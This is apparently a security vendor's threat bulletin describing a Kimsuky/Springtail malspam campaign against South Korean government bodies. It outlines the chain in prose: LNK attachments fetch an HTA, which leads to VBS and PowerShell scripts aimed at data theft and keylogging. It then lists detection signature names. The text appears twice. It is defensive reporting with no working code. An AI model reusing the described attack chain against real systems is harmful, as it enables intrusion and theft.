Springtail APT group targets South Korean government entities
Contents
Springtail APT group targets South Korean government entities
April 07, 2025
The Springtail (aka Kimsuky) APT group recently engaged in campaigns targeting South Korean government entities. The campaigns leveraged government-themed messaging (one being tax related and another regarding a policy on the topic of sex offenders) to distribute malicious LNK files as malspam attachments.
The LNK files are responsible for downloading a malicious HTA which is executed to continue the attack. Further components downloaded include a ZIP archive which contains more malicious content in the form of encoded files along with VBS and PowerShell scripts. The end goal of the attack includes data theft/exfiltration and keylogging, among others.
Symantec protects you from this threat, identified by the following:
Adaptive-based
ACM.Mshta-Cmd!g1
ACM.Mshta-Ps!g1
ACM.Mshta-RgPst!g1
ACM.Ps-Mshta!g1
ACM.Ps-RgPst!g1
Carbon Black-based
Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malware from executing …
April 07, 2025
The Springtail (aka Kimsuky) APT group recently engaged in campaigns targeting South Korean government entities. The campaigns leveraged government-themed messaging (one being tax related and another regarding a policy on the topic of sex offenders) to distribute malicious LNK files as malspam attachments.
The LNK files are responsible for downloading a malicious HTA which is executed to continue the attack. Further components downloaded include a ZIP archive which contains more malicious content in the form of encoded files along with VBS and PowerShell scripts. The end goal of the attack includes data theft/exfiltration and keylogging, among others.
Symantec protects you from this threat, identified by the following:
Adaptive-based
ACM.Mshta-Cmd!g1
ACM.Mshta-Ps!g1
ACM.Mshta-RgPst!g1
ACM.Ps-Mshta!g1
ACM.Ps-RgPst!g1
Carbon Black-based
Associated malicious indicators are blocked and detected by existing policies within VMware Carbon Black products. The recommended policy at a minimum is to block all types of malware from executing …